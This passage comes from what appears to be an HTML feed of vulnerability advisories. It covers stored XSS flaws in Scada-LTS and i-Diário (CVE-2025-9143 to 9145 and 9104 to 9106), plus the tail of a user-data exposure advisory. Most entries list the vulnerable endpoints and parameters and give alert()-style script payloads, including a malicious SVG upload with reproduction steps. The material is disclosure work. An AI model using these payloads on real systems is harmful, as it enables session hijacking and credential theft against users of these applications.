480w, /p/cve-2025-9139/image-1_hu_73d12e3ba16d4378.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <h3 id="observe-the-server-response-containing-sensitive-information-of-all-users-in-the-scada-system">Observe the server response containing sensitive information of all users in the SCADA system </h3><h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Privacy Violation: Emails, phone numbers, and usernames of all users, including administrators, are exposed.</li> <li>Privilege Escalation Support: Knowledge of admin usernames and roles could be leveraged in further attacks.</li> <li>Phishing and Social Engineering: Exposed contact information can be used to craft highly targeted attacks.</li> <li>Reconnaissance: Attackers can map the user structure of the SCADA-LTS system for further exploitation. </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md" target="_blank" rel="noopener" >https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9143/ https://www.cvehunters.com/p/cve-2025-9143/ <h2 id="cve-2025-9143-multiples-cross-site-scripting-xss-stored-in-endpoint-mailing_listsshtm">CVE-2025-9143: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>mailing_lists.shtm</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9143</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>mailing_lists.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code>, <code>userList</code> and <code>address</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-9143-multiples-cross-site-scripting-xss-stored-in-endpoint-mailing_listsshtm">CVE-2025-9143: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>mailing_lists.shtm</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9143" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9143</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>mailing_lists.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code>, <code>userList</code> and <code>address</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>mailing_lists.shtm</code></p> <p>Parameters: <code>name</code>, <code>userList</code> and <code>address</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code>, <code>userList</code> and <code>address</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(40)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9143/image.png" width="651" height="282" srcset="/p/cve-2025-9143/image_hu_f77d2b1f1c4b31b9.png 480w, /p/cve-2025-9143/image_hu_a232c9a2c6913e32.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="554px" /></p> <p><img src="/p/cve-2025-9143/image-1.png" width="631" height="309" srcset="/p/cve-2025-9143/image-1_hu_e0bceb375f809227.png 480w, /p/cve-2025-9143/image-1_hu_255f4bd3b7c4235d.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="204" data-flex-basis="490px" /></p> <p><img src="/p/cve-2025-9143/image-2.png" width="635" height="301" srcset="/p/cve-2025-9143/image-2_hu_e954bce300e18350.png 480w, /p/cve-2025-9143/image-2_hu_c4a2e415bf078fda.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="506px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9144/ https://www.cvehunters.com/p/cve-2025-9144/ <h2 id="cve-2025-9144-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-name">CVE-2025-9144: Cross-Site Scripting (XSS) Stored endpoint <code>publisher_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9144" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9144</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>publisher_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>publisher_edit.shtm</code></p><h2 id="cve-2025-9144-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-name">CVE-2025-9144: Cross-Site Scripting (XSS) Stored endpoint <code>publisher_edit.shtm</code> parameter <code>name</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9144" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9144</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>publisher_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the <code>name</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>publisher_edit.shtm</code></p> <p>Parameter: <code>name</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>name</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(32)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9144/image.png" width="632" height="301" srcset="/p/cve-2025-9144/image_hu_74749039920d3c9.png 480w, /p/cve-2025-9144/image_hu_425acfacce4d9280.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="209" data-flex-basis="503px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9145/ https://www.cvehunters.com/p/cve-2025-9145/ <h2 id="cve-2025-9145-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass">CVE-2025-9145: Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9145" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9145</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p align="justify">A Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the <code>view_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to upload malicious files into the <code>backgroundImageMP</code> parameter. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-9145-stored-cross-site-scripting-xss-injection-via-svg-file-upload-bypass">CVE-2025-9145: Stored Cross-Site Scripting (XSS) Injection via SVG File Upload Bypass </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9145" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9145</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p align="justify">A Stored Cross-Site Scripting (XSS) via SVG File Upload Bypass vulnerability was identified in the <code>view_edit.shtm</code> endpoint of the Scada-LTS application. This vulnerability allows attackers to upload malicious files into the <code>backgroundImageMP</code> parameter. The injected files are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>view_edit.shtm</code></p> <p>Parameter: <code>backgroundImageMP</code></p> <p align="justify">The application fails to properly validate and sanitize user inputs in the <code>backgroundImageMP</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><p align="justify">Save the payload in the <code>xss.svg</code> file.</p> <p align="justify">After, access the <code>views.shtm</code> page, and click on <code>"computer +"</code> to add a new <code>"view"</code>, click on <code>"Escolher arquivo"</code> button to choose the malicious file, then click on <code>"Upload image"</code> button to upload the file, after that, click on <code>"Save"</code> button. Access the file by the trigger page.</p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="p"><</span><span class="nt">svg</span> <span class="na">xmlns</span><span class="o">=</span><span class="s">""</span><span class="na">http:</span><span class="err">//</span><span class="na">www</span><span class="err">.</span><span class="na">w3</span><span class="err">.</span><span class="na">org</span><span class="err">/</span><span class="na">2000</span><span class="err">/</span><span class="na">svg</span><span class="err">""</span> <span class="na">fill</span><span class="o">=</span><span class="s">""</span><span class="na">none</span><span class="err">""</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">alert</span><span class="p">(</span><span class="s2">""</span><span class="nx">This</span> <span class="nx">is</span> <span class="nx">an</span> <span class="nx">XSS</span><span class="o">-</span><span class="nx">POC</span> <span class="nx">from</span> <span class="nx">CVEHUNTERS</span><span class="s2">""</span><span class="p">);</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">svg</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9145/image.png" width="635" height="266" srcset="/p/cve-2025-9145/image_hu_19b8b3d221202a9e.png 480w, /p/cve-2025-9145/image_hu_ce8f7117cded72f5.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9145.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Tue, 19 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9104/ https://www.cvehunters.com/p/cve-2025-9104/ <h2 id="cve-2025-9104-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aulas-por-disciplinaid">CVE-2025-9104: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9104" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9104</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-aulas-por-disciplina/(ID)</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Objeto de Conhecimento</code> and <code>Habilidades</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-9104-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-aulas-por-disciplinaid">CVE-2025-9104: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-aulas-por-disciplina/(ID)</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9104" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9104</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-aulas-por-disciplina/(ID)</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Objeto de Conhecimento</code> and <code>Habilidades</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/planos-de-aulas-por-disciplina/(ID)</code></p> <p>Parameters: <code>Parecer</code>, <code>Objeto de Conhecimento</code> and <code>Habilidades</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Parecer</code>, <code>Objeto de Conhecimento</code> and <code>Habilidades</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">ScRipT</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="mi">1</span><span class="p">)</</span><span class="nt">ScRipT</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9104/image.png" width="967" height="843" srcset="/p/cve-2025-9104/image_hu_3d05674558fa6ba6.png 480w, /p/cve-2025-9104/image_hu_776361e30dbe0dfd.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="275px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9104.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9105/ https://www.cvehunters.com/p/cve-2025-9105/ <h2 id="cve-2025-9105-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-areas-de-conhecimentoid">CVE-2025-9105: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9105" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9105</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Habilidades</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-9105-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-areas-de-conhecimentoid">CVE-2025-9105: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9105" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9105</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Habilidades</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/planos-de-ensino-por-areas-de-conhecimento/[ID]</code></p> <p>Parameters: <code>Parecer</code>, <code>Conteúdos</code> and <code>Habilidades</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Parecer</code>, <code>Conteúdos</code> and <code>Habilidades</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9105/image.png" width="964" height="445" srcset="/p/cve-2025-9105/image_hu_6a8ccd33487555d5.png 480w, /p/cve-2025-9105/image_hu_3c579fd2be61c8bf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="519px" /></p> <p><img src="/p/cve-2025-9105/image-1.png" width="682" height="415" srcset="/p/cve-2025-9105/image-1_hu_79d858c0f7af1de1.png 480w, /p/cve-2025-9105/image-1_hu_a6bd84db6d6c2b22.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="164" data-flex-basis="394px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-9105.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Mon, 18 Aug 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-9106/ https://www.cvehunters.com/p/cve-2025-9106/ <h2 id="cve-2025-9106-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-disciplinaid">CVE-2025-9106: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9106" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9106</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-ensino-por-disciplina/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p><h2 id="cve-2025-9106-multiples-cross-site-scripting-xss-stored-in-endpoint-planos-de-ensino-por-disciplinaid">CVE-2025-9106: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>/planos-de-ensino-por-disciplina/[ID]</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-9106" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-9106</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>/planos-de-ensino-por-disciplina/[ID]</code> endpoint of the i-Diário application. This vulnerability allows attackers to inject malicious scripts into the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/planos-de-ensino-por-disciplina/[ID]</code></p> <p>Parameters: <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>Parecer</code>, <code>Conteúdos</code> and <code>Objetivos</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> "><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-9106/image.png" width="960" height="455" srcset="/p/cve-2025-9106/image_hu_bfb635a7cbffc853.png 480w, /p/cve-2025-9106/image_hu_8eac10bb6159118e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="210" data-flex-basis="506px" /></p> <p><img src="/p/cve-2025-9106/image-1.png" width="653" height="412" srcset="/p/cve-2025-9106/image-1_hu_aec1559962a33def.png 480w, /p/cve-2025-9106/image-1_hu_8b0ce06d2d54dc01.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="158" data-flex-basis="380px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session 